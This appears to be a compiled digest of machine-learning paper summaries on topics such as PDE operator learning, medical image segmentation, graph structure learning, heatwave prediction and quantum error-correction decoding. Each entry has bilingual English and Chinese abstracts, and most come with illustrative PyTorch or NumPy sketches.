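A minimal FedAvg sketch for the forecasting side of such a system: each prosumer/consumer site trains a small regressor locally, and the server averages the weights. The tiny MLP, synthetic data, and plain unweighted averaging are illustrative assumptions; the blockchain ledger layer described in the paper is not modeled here.

```python
import copy
import torch
import torch.nn as nn

def local_train(model, data, targets, epochs=5, lr=1e-2):
    model = copy.deepcopy(model)                          # train a local copy only
    opt = torch.optim.SGD(model.parameters(), lr=lr)
    for _ in range(epochs):
        opt.zero_grad()
        loss = nn.functional.mse_loss(model(data), targets)
        loss.backward()
        opt.step()
    return model.state_dict()

def fed_avg(state_dicts):
    avg = copy.deepcopy(state_dicts[0])
    for key in avg:                                       # element-wise average of all clients
        avg[key] = torch.stack([sd[key] for sd in state_dicts]).mean(dim=0)
    return avg

global_model = nn.Sequential(nn.Linear(4, 16), nn.ReLU(), nn.Linear(16, 1))
clients = [(torch.randn(64, 4), torch.randn(64, 1)) for _ in range(5)]   # per-site load data

for round_id in range(10):
    local_states = [local_train(global_model, x, y) for x, y in clients]
    global_model.load_state_dict(fed_avg(local_states))   # server aggregation step
```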

DiTTO: Diffusion-inspired Temporal Transformer Operator

  • paper_url: http://arxiv.org/abs/2307.09072
  • repo_url: None
  • paper_authors: Oded Ovadia, Eli Turkel, Adar Kahana, George Em Karniadakis
  • for: 用于求解含时偏微分方程(PDE)。
  • methods: 提出一种基于算子学习的数据驱动方法,无需任何时间离散化即可在时间上连续求解。
  • results: 在多维 Burgers 方程、Navier-Stokes 方程以及二维和三维声波方程上达到了最先进的精度,并且能够在时间上实现零样本超分辨率。
    Abstract Solving partial differential equations (PDEs) using a data-driven approach has become increasingly common. The recent development of the operator learning paradigm has enabled the solution of a broader range of PDE-related problems. We propose an operator learning method to solve time-dependent PDEs continuously in time without needing any temporal discretization. The proposed approach, named DiTTO, is inspired by latent diffusion models. While diffusion models are usually used in generative artificial intelligence tasks, their time-conditioning mechanism is extremely useful for PDEs. The diffusion-inspired framework is combined with elements from the Transformer architecture to improve its capabilities. We demonstrate the effectiveness of the new approach on a wide variety of PDEs in multiple dimensions, namely the 1-D Burgers' equation, 2-D Navier-Stokes equations, and the acoustic wave equation in 2-D and 3-D. DiTTO achieves state-of-the-art results in terms of accuracy for these problems. We also present a method to improve the performance of DiTTO by using fast sampling concepts from diffusion models. Finally, we show that DiTTO can accurately perform zero-shot super-resolution in time.
    摘要 使用数据驱动方法求解偏微分方程(PDE)已日益普遍。算子学习范式的最新发展使得更广泛的 PDE 相关问题得以求解。我们提出一种算子学习方法,名为 DiTTO,可以在不需要任何时间离散化的情况下,在时间上连续地求解含时 PDE。该方法受潜在扩散模型的启发:虽然扩散模型通常用于生成式人工智能任务,但其时间条件化机制对 PDE 非常有用。我们将受扩散启发的框架与 Transformer 架构中的元素相结合,以提升其能力。我们在多个维度的多种 PDE 上验证了新方法的有效性,包括一维 Burgers 方程、二维 Navier-Stokes 方程,以及二维和三维的声波方程,DiTTO 在这些问题上均达到了最先进的精度。此外,我们还提出了利用扩散模型中的快速采样思想来提升 DiTTO 性能的方法。最后,我们展示了 DiTTO 能够在时间维度上准确地实现零样本超分辨率。
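
A sketch of the diffusion-style time-conditioning idea: the query time t is embedded with sinusoidal features and injected into the network via FiLM-like scale/shift, so one model maps an initial condition to the solution at any continuous time without a temporal grid. Architecture details below are assumptions, not the DiTTO implementation.

```python
import math
import torch
import torch.nn as nn

def sinusoidal_embedding(t: torch.Tensor, dim: int = 64) -> torch.Tensor:
    # t: (B,) continuous times -> (B, dim)
    half = dim // 2
    freqs = torch.exp(-math.log(10000.0) * torch.arange(half) / half)
    angles = t[:, None] * freqs[None, :]
    return torch.cat([torch.sin(angles), torch.cos(angles)], dim=-1)

class TimeConditionedBlock(nn.Module):
    def __init__(self, width: int, t_dim: int = 64):
        super().__init__()
        self.lin = nn.Linear(width, width)
        self.film = nn.Linear(t_dim, 2 * width)      # produces per-feature scale and shift

    def forward(self, h, t_emb):
        scale, shift = self.film(t_emb).chunk(2, dim=-1)
        return torch.relu(self.lin(h) * (1 + scale) + shift)

class TimeOperator(nn.Module):
    """Maps an initial condition u0 (B, N) and a time t (B,) to u(t) (B, N)."""
    def __init__(self, n_points: int, width: int = 128):
        super().__init__()
        self.inp = nn.Linear(n_points, width)
        self.blocks = nn.ModuleList([TimeConditionedBlock(width) for _ in range(4)])
        self.out = nn.Linear(width, n_points)

    def forward(self, u0, t):
        t_emb = sinusoidal_embedding(t)
        h = self.inp(u0)
        for blk in self.blocks:
            h = blk(h, t_emb)
        return self.out(h)

model = TimeOperator(n_points=256)
u_t = model(torch.randn(8, 256), torch.rand(8))       # query the solution at any continuous time
```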

Evaluate Fine-tuning Strategies for Fetal Head Ultrasound Image Segmentation with U-Net

  • paper_url: http://arxiv.org/abs/2307.09067
  • repo_url: https://github.com/13204942/ft_methods_for_fetal_head_segmentation
  • paper_authors: Fangyijie Wang, Guénolé Silvestre, Kathleen M. Curran
  • for: 这篇研究的目的是提高妊娠期间胎头周长(HC)的测量效率,使用迁移学习(Transfer Learning,TL)方法来改善医学生物测量的精度。
  • methods: 本研究使用了卷积神经网络(Convolutional Neural Network,CNN)模型,并采用轻量级的 MobileNet 作为 U-Net 的编码器进行微调。
  • results: 研究发现,借助迁移学习方法,仅需有限的训练开销即可在胎头超声图像上训练出高精度的 U-Net 分割网络;此外,所提出的微调策略能够在大幅减少可训练参数的同时保持性能,有助于缩小医学图像分析模型的规模。
    Abstract Fetal head segmentation is a crucial step in measuring the fetal head circumference (HC) during gestation, an important biometric in obstetrics for monitoring fetal growth. However, manual biometry generation is time-consuming and results in inconsistent accuracy. To address this issue, convolutional neural network (CNN) models have been utilized to improve the efficiency of medical biometry. But training a CNN network from scratch is a challenging task, we proposed a Transfer Learning (TL) method. Our approach involves fine-tuning (FT) a U-Net network with a lightweight MobileNet as the encoder to perform segmentation on a set of fetal head ultrasound (US) images with limited effort. This method addresses the challenges associated with training a CNN network from scratch. It suggests that our proposed FT strategy yields segmentation performance that is comparable when trained with a reduced number of parameters by 85.8%. And our proposed FT strategy outperforms other strategies with smaller trainable parameter sizes below 4.4 million. Thus, we contend that it can serve as a dependable FT approach for reducing the size of models in medical image analysis. Our key findings highlight the importance of the balance between model performance and size in developing Artificial Intelligence (AI) applications by TL methods. Code is available at https://github.com/13204942/FT_Methods_for_Fetal_Head_Segmentation.
    摘要 胎头分割是孕期测量胎头周长(HC)的关键步骤,而 HC 是产科中监测胎儿生长的重要生物测量指标。然而,人工生成生物测量既耗时,精度又不稳定。为了解决这一问题,卷积神经网络(CNN)模型已被用于提高医学生物测量的效率;但从零开始训练 CNN 网络是一项具有挑战性的任务,因此我们提出了一种迁移学习(TL)方法。我们的方法是对以轻量级 MobileNet 为编码器的 U-Net 网络进行微调(FT),从而以较小的代价在一组胎头超声(US)图像上完成分割。该方法解决了从零开始训练 CNN 网络所面临的挑战。结果表明,我们提出的 FT 策略在可训练参数减少 85.8% 的情况下仍能取得相当的分割性能,并且优于其他可训练参数少于 440 万的策略。因此,我们认为它可以作为医学图像分析中缩减模型规模的一种可靠的 FT 方法。我们的主要发现强调了在利用 TL 方法开发人工智能(AI)应用时,模型性能与模型规模之间取得平衡的重要性。代码可在 https://github.com/13204942/FT_Methods_for_Fetal_Head_Segmentation 获取。
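
A sketch of one fine-tuning strategy in the spirit of the paper: a U-Net with an ImageNet-pretrained MobileNet encoder in which the encoder is frozen and only the decoder and segmentation head are trained on ultrasound masks. It relies on the third-party segmentation_models_pytorch package; the exact layer split, loss, and hyper-parameters are illustrative assumptions, not the paper's recipe.

```python
import torch
import segmentation_models_pytorch as smp

model = smp.Unet(
    encoder_name="mobilenet_v2",      # lightweight encoder
    encoder_weights="imagenet",       # transfer learning from ImageNet
    in_channels=1,                    # grayscale ultrasound
    classes=1,                        # binary fetal-head mask
)

# Freeze the pretrained encoder; train only decoder + segmentation head.
for p in model.encoder.parameters():
    p.requires_grad = False

trainable = [p for p in model.parameters() if p.requires_grad]
print(f"trainable params: {sum(p.numel() for p in trainable) / 1e6:.2f}M")

optimizer = torch.optim.Adam(trainable, lr=1e-3)
loss_fn = smp.losses.DiceLoss(mode="binary")

# one illustrative training step on dummy data
images = torch.randn(4, 1, 256, 256)
masks = torch.randint(0, 2, (4, 1, 256, 256)).float()
optimizer.zero_grad()
loss = loss_fn(model(images), masks)
loss.backward()
optimizer.step()
```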

Learning Adaptive Neighborhoods for Graph Neural Networks

  • paper_url: http://arxiv.org/abs/2307.09065
  • repo_url: None
  • paper_authors: Avishkar Saha, Oscar Mendez, Chris Russell, Richard Bowden
  • for: 图卷积网络可实现对图结构数据的端到端学习,但许多工作假设图结构已知。当输入图含噪声或不可得时,一种做法是构建或学习潜在的图结构;这些方法通常为整张图固定节点的度,这并不理想。
  • methods: 我们提出了一种新颖的端到端可微图生成器,用于构建图结构,其中每个节点都可以选择自己的邻居和邻域大小。
  • results: 我们将该模块集成到轨迹预测、点云分类和节点分类流程中,在多种数据集和 GCN 骨干上取得了优于其他结构学习方法的精度。
    Abstract Graph convolutional networks (GCNs) enable end-to-end learning on graph structured data. However, many works assume a given graph structure. When the input graph is noisy or unavailable, one approach is to construct or learn a latent graph structure. These methods typically fix the choice of node degree for the entire graph, which is suboptimal. Instead, we propose a novel end-to-end differentiable graph generator which builds graph topologies where each node selects both its neighborhood and its size. Our module can be readily integrated into existing pipelines involving graph convolution operations, replacing the predetermined or existing adjacency matrix with one that is learned, and optimized, as part of the general objective. As such it is applicable to any GCN. We integrate our module into trajectory prediction, point cloud classification and node classification pipelines resulting in improved accuracy over other structure-learning methods across a wide range of datasets and GCN backbones.
    摘要 图卷积网络(GCN)可以实现对图结构数据的端到端学习。然而,许多工作假设图结构是给定的。当输入图含噪声或不可得时,一种做法是构建或学习潜在的图结构。这些方法通常为整张图固定节点的度,这并不理想。与此相反,我们提出了一种新颖的端到端可微图生成器,它所构建的图拓扑中每个节点都能自行选择其邻域及其大小。我们的模块可以方便地集成到任何涉及图卷积操作的现有流程中,用一个在总体目标下学习并优化的邻接矩阵取代预先给定或已有的邻接矩阵,因此它适用于任何 GCN。我们将该模块集成到轨迹预测、点云分类和节点分类流程中,在广泛的数据集和 GCN 骨干上取得了优于其他结构学习方法的精度。
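
A generic sketch of a differentiable graph generator in this spirit: each node produces a soft adjacency row from embedding similarities, with a learned per-node threshold controlling its effective neighborhood size. This is an illustrative stand-in trained end-to-end with the task loss, not the authors' exact module.

```python
import torch
import torch.nn as nn

class DifferentiableGraphGenerator(nn.Module):
    def __init__(self, in_dim: int, emb_dim: int = 32, temperature: float = 0.1):
        super().__init__()
        self.embed = nn.Linear(in_dim, emb_dim)
        self.threshold = nn.Linear(in_dim, 1)     # per-node control of neighborhood "size"
        self.temperature = temperature

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        # x: (N, in_dim) node features -> (N, N) soft adjacency
        z = torch.nn.functional.normalize(self.embed(x), dim=-1)
        sim = z @ z.t()                                # cosine similarities in [-1, 1]
        thr = torch.tanh(self.threshold(x))            # learned per-node threshold
        adj = torch.sigmoid((sim - thr) / self.temperature)
        adj = adj * (1 - torch.eye(x.size(0)))         # no self-loops
        return adj

# usage inside a GCN-style layer: the adjacency is learned with the downstream objective
x = torch.randn(100, 16)
gen = DifferentiableGraphGenerator(16)
adj = gen(x)                                           # (100, 100), fully differentiable
deg = adj.sum(-1, keepdim=True).clamp(min=1e-6)
h = (adj / deg) @ x                                    # simple mean-aggregation message passing
```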

Extreme heatwave sampling and prediction with analog Markov chain and comparisons with deep learning

  • paper_url: http://arxiv.org/abs/2307.09060
  • repo_url: None
  • paper_authors: George Miloshevich, Dario Lucente, Pascal Yiou, Freddy Bouchet
  • For: The paper aims to develop a data-driven emulator, called stochastic weather generator (SWG), to estimate the probabilities of prolonged heatwaves in France and Scandinavia.
  • Methods: The SWG emulator uses the method of analogs of circulation, combined with temperature and soil moisture as predictor fields. The emulator is trained on an intermediate complexity climate model run, and the performance is evaluated using a proper score appropriate for rare events. Dimensionality reduction techniques are applied to accelerate the computation of analogs.
  • Results: The probabilistic prediction achieved with SWG is compared with the one achieved with a Convolutional Neural Network (CNN). The SWG emulator trained on 80 years of data is capable of estimating extreme return times of order of thousands of years for heatwaves longer than several days more precisely than the fit based on the generalised extreme value distribution. The quality of its synthetic extreme teleconnection patterns is studied, and two examples of such synthetic teleconnection patterns for heatwaves in France and Scandinavia are provided.
    Abstract We present a data-driven emulator, stochastic weather generator (SWG), suitable for estimating probabilities of prolonged heatwaves in France and Scandinavia. This emulator is based on the method of analogs of circulation to which we add temperature and soil moisture as predictor fields. We train the emulator on an intermediate complexity climate model run and show that it is capable of predicting conditional probabilities (forecasting) of heatwaves out of sample. Special attention is payed that this prediction is evaluated using proper score appropriate for rare events. To accelerate the computation of analogs dimensionality reduction techniques are applied and the performance is evaluated. The probabilistic prediction achieved with SWG is compared with the one achieved with Convolutional Neural Network (CNN). With the availability of hundreds of years of training data CNNs perform better at the task of probabilistic prediction. In addition, we show that the SWG emulator trained on 80 years of data is capable of estimating extreme return times of order of thousands of years for heatwaves longer than several days more precisely than the fit based on generalised extreme value distribution. Finally, the quality of its synthetic extreme teleconnection patterns obtained with stochastic weather generator is studied. We showcase two examples of such synthetic teleconnection patterns for heatwaves in France and Scandinavia that compare favorably to the very long climate model control run.
    摘要 我们介绍了一种数据驱动的模拟器——随机天气生成器(SWG),用于估计法国和斯堪的纳维亚地区持续热浪的概率。该模拟器基于环流类比方法,并加入温度和土壤湿度作为预测场。我们在一个中等复杂度气候模式的运行结果上训练该模拟器,并证明它能够对样本外的热浪进行条件概率预测;我们特别采用适用于稀有事件的评分规则来评估这种预测。为加速类比的计算,我们应用了降维技术并评估了其性能。我们将 SWG 的概率预测与卷积神经网络(CNN)的预测进行了比较:在拥有数百年训练数据的情况下,CNN 在概率预测任务上表现更好。此外,我们还表明,仅用 80 年数据训练的 SWG 模拟器,就能比基于广义极值分布的拟合更精确地估计持续数天以上热浪的数千年量级极端重现期。最后,我们研究了随机天气生成器所生成的合成极端遥相关模式的质量,并展示了法国和斯堪的纳维亚热浪的两个此类合成遥相关模式示例,其与超长气候模式控制试验的结果相当吻合。
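
A toy sketch of one analog Markov chain / stochastic weather generator step: states are PCA-reduced daily fields; for the current state we find its K nearest analogs in a training archive and jump to the day following a randomly chosen analog. Data, dimensionality, and K are illustrative assumptions.

```python
import numpy as np
from sklearn.decomposition import PCA

rng = np.random.default_rng(0)
archive = rng.standard_normal((10_000, 500))       # daily circulation/predictor fields, flattened
pca = PCA(n_components=20).fit(archive)
latent = pca.transform(archive)                    # dimensionality reduction speeds up analog search

def analog_step(state: np.ndarray, K: int = 10) -> np.ndarray:
    """One stochastic transition: move to the successor of one of the K closest analogs."""
    dists = np.linalg.norm(latent[:-1] - state, axis=1)   # exclude last day (no successor)
    analogs = np.argsort(dists)[:K]
    chosen = rng.choice(analogs)
    return latent[chosen + 1]

# generate a synthetic 30-day trajectory starting from an observed day
state = latent[123]
trajectory = [state]
for _ in range(29):
    state = analog_step(state)
    trajectory.append(state)
trajectory = np.vstack(trajectory)                  # (30, 20) synthetic latent sequence
```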

Deep learning for unsupervised domain adaptation in medical imaging: Recent advancements and future perspectives

  • paper_url: http://arxiv.org/abs/2308.01265
  • repo_url: None
  • paper_authors: Suruchi Kumari, Pravendra Singh
  • for: 本文主要探讨了医学成像领域中最新的深度无监督领域自适应(Unsupervised Domain Adaptation,UDA)技术,以及它们在各种医学成像任务中的应用。
  • methods: 本文分析了医学成像领域中最新的 UDA 方法,包括特征对齐、图像翻译、自监督和解耦表示等多种方法。
  • results: 本文对各种 UDA 方法进行了技术分析和评估,并将其分为六个类别,涵盖图像分类、生物标志物检测、肿瘤识别、脑成像分析、肠胃成像分析等多种任务。
    Abstract Deep learning has demonstrated remarkable performance across various tasks in medical imaging. However, these approaches primarily focus on supervised learning, assuming that the training and testing data are drawn from the same distribution. Unfortunately, this assumption may not always hold true in practice. To address these issues, unsupervised domain adaptation (UDA) techniques have been developed to transfer knowledge from a labeled domain to a related but unlabeled domain. In recent years, significant advancements have been made in UDA, resulting in a wide range of methodologies, including feature alignment, image translation, self-supervision, and disentangled representation methods, among others. In this paper, we provide a comprehensive literature review of recent deep UDA approaches in medical imaging from a technical perspective. Specifically, we categorize current UDA research in medical imaging into six groups and further divide them into finer subcategories based on the different tasks they perform. We also discuss the respective datasets used in the studies to assess the divergence between the different domains. Finally, we discuss emerging areas and provide insights and discussions on future research directions to conclude this survey.
    摘要 深度学习在医学影像的各类任务中已经展现出卓越的性能。然而,这些方法主要基于有监督学习,并假设训练数据和测试数据来自同一分布,而这一假设在实践中并不总是成立。为了解决这些问题,研究者提出了无监督领域自适应(UDA)技术,用于将知识从有标注的领域迁移到相关但无标注的领域。近年来,UDA 领域取得了大量进展,涌现出特征对齐、图像翻译、自监督和解耦表示等多种方法。在本文中,我们从技术角度对医学影像领域中最新的深度 UDA 方法进行了全面的文献综述,将当前研究划分为六个组别,并根据其所执行的不同任务进一步细分为更小的子类别;我们还讨论了各研究所使用的数据集,以评估不同领域之间的差异。最后,我们探讨了新兴的研究方向,并就未来研究给出见解与讨论,以此结束本综述。

Globally solving the Gromov-Wasserstein problem for point clouds in low dimensional Euclidean spaces

  • paper_url: http://arxiv.org/abs/2307.09057
  • repo_url: None
  • paper_authors: Martin Ryner, Jan Kronqvist, Johan Karlsson
  • for: Computes the Gromov-Wasserstein problem between two sets of points in low dimensional spaces, to quantify the similarity between two formations or shapes.
  • methods: Reformulates the Quadratic Assignment Problem (QAP) as an optimization problem with a low-dimensional domain, leveraging the fact that the problem can be expressed as a concave quadratic optimization problem with low rank.
  • results: Scales well with the number of points and can be used to find the global solution for large-scale problems with thousands of points.
    Abstract This paper presents a framework for computing the Gromov-Wasserstein problem between two sets of points in low dimensional spaces, where the discrepancy is the squared Euclidean norm. The Gromov-Wasserstein problem is a generalization of the optimal transport problem that finds the assignment between two sets preserving pairwise distances as much as possible. This can be used to quantify the similarity between two formations or shapes, a common problem in AI and machine learning. The problem can be formulated as a Quadratic Assignment Problem (QAP), which is in general computationally intractable even for small problems. Our framework addresses this challenge by reformulating the QAP as an optimization problem with a low-dimensional domain, leveraging the fact that the problem can be expressed as a concave quadratic optimization problem with low rank. The method scales well with the number of points, and it can be used to find the global solution for large-scale problems with thousands of points. We compare the computational complexity of our approach with state-of-the-art methods on synthetic problems and apply it to a near-symmetrical problem which is of particular interest in computational biology.
    摘要 本文提出了一个求解低维空间中两组点之间 Gromov-Wasserstein 问题的框架,其中差异度量为欧氏距离的平方。Gromov-Wasserstein 问题是最优传输问题的推广,旨在寻找两组点之间尽可能保持成对距离的对应关系,可用于量化两个构型或形状之间的相似性,这是人工智能和机器学习中的常见问题。该问题可表述为二次指派问题(QAP),即使规模很小,通常也难以计算。我们的框架利用该问题可表示为低秩凹二次优化问题这一事实,将 QAP 重新表述为定义在低维域上的优化问题,从而应对这一挑战。该方法随点数的增加具有良好的可扩展性,可用于求解包含数千个点的大规模问题的全局解。我们在合成问题上将所提方法的计算复杂度与最先进方法进行了比较,并将其应用于计算生物学中特别关注的近对称问题。
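
A small sketch of the (discrete, uniform-weight) Gromov-Wasserstein objective with squared Euclidean distances, evaluated for a candidate one-to-one assignment. This only evaluates the cost by brute force; the paper's contribution is a low-dimensional reformulation that finds the global optimum efficiently.

```python
import numpy as np

def gw_cost(X: np.ndarray, Y: np.ndarray, perm: np.ndarray) -> float:
    """X: (n, dx), Y: (n, dy), perm: assignment i -> perm[i]."""
    Dx = np.sum((X[:, None, :] - X[None, :, :]) ** 2, axis=-1)   # squared pairwise distances
    Dy = np.sum((Y[:, None, :] - Y[None, :, :]) ** 2, axis=-1)
    Dy_p = Dy[np.ix_(perm, perm)]                                # distances under the assignment
    return float(np.mean((Dx - Dy_p) ** 2))

rng = np.random.default_rng(0)
X = rng.standard_normal((50, 2))
theta = np.pi / 5
R = np.array([[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]])
Y = X @ R.T + np.array([3.0, -1.0])           # rigidly moved copy of X: distances are preserved

identity = np.arange(50)
random_perm = rng.permutation(50)
print("cost of true matching:", gw_cost(X, Y, identity))     # ≈ 0
print("cost of random matching:", gw_cost(X, Y, random_perm))
```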

Outlier-Robust Tensor Low-Rank Representation for Data Clustering

  • paper_url: http://arxiv.org/abs/2307.09055
  • repo_url: None
  • paper_authors: Tong Wu
  • for: 从受异常值污染的张量数据中检测异常并对数据进行聚类
  • methods: 基于张量奇异值分解(t-SVD)代数框架的异常检测与张量数据聚类
  • results: 能够在较宽松的条件下精确恢复干净数据的行空间并检测出异常值,同时还可以处理数据部分缺失的情形。
    Abstract Low-rank tensor analysis has received widespread attention with many practical applications. However, the tensor data are often contaminated by outliers or sample-specific corruptions. How to recover the tensor data that are corrupted by outliers and perform data clustering remains a challenging problem. This paper develops an outlier-robust tensor low-rank representation (OR-TLRR) method for simultaneous outlier detection and tensor data clustering based on the tensor singular value decomposition (t-SVD) algebraic framework. It is motivated by the recently proposed tensor-tensor product induced by invertible linear transforms that satisfy certain conditions. For tensor observations with arbitrary outlier corruptions, OR-TLRR has provable performance guarantee for exactly recovering the row space of clean data and detecting outliers under mild conditions. Moreover, an extension of OR-TLRR is also proposed to handle the case when parts of the data are missing. Finally, extensive experimental results on both synthetic and real data demonstrate the effectiveness of the proposed algorithms.
    摘要 低秩张量分析已受到广泛关注,并有许多实际应用。然而,张量数据经常被异常值或样本特有的污染所损坏。如何恢复被异常值污染的张量数据并对其进行聚类,仍然是一个具有挑战性的问题。本文基于张量奇异值分解(t-SVD)代数框架,提出了一种对异常值鲁棒的张量低秩表示(OR-TLRR)方法,用于同时进行异常检测和张量数据聚类。该方法的动机来自最近提出的、由满足特定条件的可逆线性变换诱导的张量-张量积。对于带有任意异常污染的张量观测数据,OR-TLRR 在较宽松的条件下具有可证明的性能保证,能够精确恢复干净数据的行空间并检测出异常值。此外,本文还提出了 OR-TLRR 的扩展,以处理数据部分缺失的情形。最后,在合成数据和真实数据上的大量实验结果验证了所提算法的有效性。
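
A minimal sketch of the t-SVD, the algebraic tool that tensor low-rank methods such as OR-TLRR build on: FFT along the third mode, a matrix SVD of every frontal slice in the Fourier domain (with conjugate symmetry enforced so the result is real), and an inverse FFT back. This is the standard t-SVD recipe under the default DFT transform, not the paper's full algorithm.

```python
import numpy as np

def t_svd(T: np.ndarray):
    """t-SVD of a real (n1, n2, n3) tensor: T = U * S * V^T under the t-product."""
    n1, n2, n3 = T.shape
    Tf = np.fft.fft(T, axis=2)
    Uf = np.zeros((n1, n1, n3), dtype=complex)
    Sf = np.zeros((n1, n2, n3), dtype=complex)
    Vf = np.zeros((n2, n2, n3), dtype=complex)
    for k in range(n3 // 2 + 1):                  # SVD of half the slices ...
        u, s, vh = np.linalg.svd(Tf[:, :, k])
        Uf[:, :, k], Vf[:, :, k] = u, vh.conj().T
        np.fill_diagonal(Sf[:, :, k], s)
        if 0 < k < (n3 + 1) // 2:                 # ... remaining slices by conjugate symmetry
            Uf[:, :, n3 - k] = u.conj()
            Vf[:, :, n3 - k] = vh.T
            np.fill_diagonal(Sf[:, :, n3 - k], s)
    U, S, V = (np.real(np.fft.ifft(X, axis=2)) for X in (Uf, Sf, Vf))
    return U, S, V

def t_product(A: np.ndarray, B: np.ndarray) -> np.ndarray:
    Cf = np.einsum('ijk,jlk->ilk', np.fft.fft(A, axis=2), np.fft.fft(B, axis=2))
    return np.real(np.fft.ifft(Cf, axis=2))

def t_transpose(A: np.ndarray) -> np.ndarray:
    At = A.transpose(1, 0, 2)
    return np.concatenate([At[:, :, :1], At[:, :, :0:-1]], axis=2)   # reverse slices 1..n3-1

rng = np.random.default_rng(0)
T = rng.standard_normal((30, 20, 5))
U, S, V = t_svd(T)
rec = t_product(t_product(U, S), t_transpose(V))
print("reconstruction error:", np.abs(rec - T).max())   # ≈ 0
```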

qecGPT: decoding Quantum Error-correcting Codes with Generative Pre-trained Transformers

  • paper_url: http://arxiv.org/abs/2307.09025
  • repo_url: https://github.com/chy-i/qecgpt
  • paper_authors: Hanyan Cao, Feng Pan, Yijia Wang, Pan Zhang
  • for: 提出了一个利用生成模型对量子纠错码进行译码的通用框架。
  • methods: 使用自回归神经网络(特别是 Transformer)学习逻辑算符与症状的联合概率。
  • results: 可以高效地计算逻辑算符的似然,并直接生成最可能的逻辑算符,计算复杂度为 $\mathcal O(2k)$,优于传统的最大似然译码算法。
    Abstract We propose a general framework for decoding quantum error-correcting codes with generative modeling. The model utilizes autoregressive neural networks, specifically Transformers, to learn the joint probability of logical operators and syndromes. This training is in an unsupervised way, without the need for labeled training data, and is thus referred to as pre-training. After the pre-training, the model can efficiently compute the likelihood of logical operators for any given syndrome, using maximum likelihood decoding. It can directly generate the most-likely logical operators with computational complexity $\mathcal O(2k)$ in the number of logical qubits $k$, which is significantly better than the conventional maximum likelihood decoding algorithms that require $\mathcal O(4^k)$ computation. Based on the pre-trained model, we further propose refinement to achieve more accurately the likelihood of logical operators for a given syndrome by directly sampling the stabilizer operators. We perform numerical experiments on stabilizer codes with small code distances, using both depolarizing error models and error models with correlated noise. The results show that our approach provides significantly better decoding accuracy than the minimum weight perfect matching and belief-propagation-based algorithms. Our framework is general and can be applied to any error model and quantum codes with different topologies such as surface codes and quantum LDPC codes. Furthermore, it leverages the parallelization capabilities of GPUs, enabling simultaneous decoding of a large number of syndromes. Our approach sheds light on the efficient and accurate decoding of quantum error-correcting codes using generative artificial intelligence and modern computational power.
    摘要 我们提出了一个基于生成模型的量子纠错码译码通用框架。该模型利用自回归神经网络(具体为 Transformer)学习逻辑算符与症状的联合概率。训练以无监督方式进行,不需要带标注的训练数据,因此称为预训练。预训练完成后,模型可以高效地计算任意给定症状下逻辑算符的似然,从而实现最大似然译码;它能以 $\mathcal O(2k)$ 的计算复杂度($k$ 为逻辑量子比特数)直接生成最可能的逻辑算符,显著优于需要 $\mathcal O(4^k)$ 计算量的传统最大似然译码算法。在预训练模型的基础上,我们进一步提出通过直接对稳定子算符进行采样来细化给定症状下逻辑算符的似然估计。我们在码距较小的稳定子码上进行了数值实验,采用了去极化误差模型以及带有关联噪声的误差模型。结果表明,我们的方法比最小权完美匹配和基于置信传播的算法具有显著更高的译码精度。该框架具有通用性,可应用于任意误差模型以及表面码、量子 LDPC 码等不同拓扑结构的量子码;同时它还能利用 GPU 的并行能力,同时译码大量症状。我们的方法为利用生成式人工智能与现代算力实现量子纠错码的高效精确译码提供了新思路。
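
A generic sketch of the decoding idea: an autoregressive model gives p(logical_i | logical_<i, syndrome), so greedy maximum-likelihood decoding needs only 2k sequential queries for k logical qubits (two logical bits per qubit) instead of enumerating all 4^k logical classes. The small GRU conditional model below is a stand-in for the Transformer used in qecGPT; in training one would maximize the log-likelihood of true logical bits with teacher forcing.

```python
import torch
import torch.nn as nn

class ARDecoder(nn.Module):
    def __init__(self, syndrome_len: int, hidden: int = 64):
        super().__init__()
        self.init = nn.Linear(syndrome_len, hidden)
        self.gru = nn.GRUCell(1, hidden)
        self.head = nn.Linear(hidden, 1)

    @torch.no_grad()
    def greedy_decode(self, syndrome: torch.Tensor, num_bits: int) -> torch.Tensor:
        h = torch.tanh(self.init(syndrome))          # condition the state on the syndrome
        prev = torch.zeros(syndrome.size(0), 1)      # start token
        bits = []
        for _ in range(num_bits):                    # 2k sequential steps for k logical qubits
            h = self.gru(prev, h)                    # state carries syndrome + decoded bits so far
            logit = self.head(h)
            prev = (logit > 0).float()               # most likely value of the next logical bit
            bits.append(prev)
        return torch.cat(bits, dim=1)

k = 3
decoder = ARDecoder(syndrome_len=8)
syndromes = torch.randint(0, 2, (16, 8)).float()
logicals = decoder.greedy_decode(syndromes, num_bits=2 * k)   # (16, 6) most likely logical operators
```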

U-shaped Transformer: Retain High Frequency Context in Time Series Analysis

  • paper_url: http://arxiv.org/abs/2307.09019
  • repo_url: None
  • paper_authors: Qingkui Chen, Yiqin Zhang
  • for: 本研究旨在增进时间序列预测领域中的 neural network 性能,通过综合利用 transformer 和 MLP 两种网络结构。
  • methods: 本研究在传统 transformer 骨干中引入受 Unet 启发的 skip-layer 连接以及 patch merge 和 split 操作,以保留从输入到输出的高频上下文,并使用更大的数据集来充分发挥 transformer 骨干的作用。
  • results: 实验结果表明,该模型在多个数据集上以相对较低的成本取得了先进的性能。
    Abstract Time series prediction plays a crucial role in various industrial fields. In recent years, neural networks with a transformer backbone have achieved remarkable success in many domains, including computer vision and NLP. In time series analysis domain, some studies have suggested that even the simplest MLP networks outperform advanced transformer-based networks on time series forecast tasks. However, we believe these findings indicate there to be low-rank properties in time series sequences. In this paper, we consider the low-pass characteristics of transformers and try to incorporate the advantages of MLP. We adopt skip-layer connections inspired by Unet into traditional transformer backbone, thus preserving high-frequency context from input to output, namely U-shaped Transformer. We introduce patch merge and split operation to extract features with different scales and use larger datasets to fully make use of the transformer backbone. Our experiments demonstrate that the model performs at an advanced level across multiple datasets with relatively low cost.
    摘要 时间序列预测在各个产业领域发挥着重要作用。近年来,以 transformer 为骨干的神经网络在计算机视觉和自然语言处理等多个领域取得了显著成功。在时间序列分析领域,一些研究表明,即使是最简单的 MLP 网络,在时间序列预测任务上也能超越先进的基于 transformer 的网络;我们认为这些发现反映了时间序列中存在低秩特性。在本文中,我们考虑了 transformer 的低通特性,并尝试融合 MLP 的优点:我们在传统 transformer 骨干中引入受 Unet 启发的 skip-layer 连接,从而保留从输入到输出的高频上下文,即 U 形 Transformer;我们还引入 patch 合并与拆分操作来提取不同尺度的特征,并使用更大的数据集以充分发挥 transformer 骨干的作用。实验表明,该模型在多个数据集上以相对较低的成本取得了先进的性能。
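
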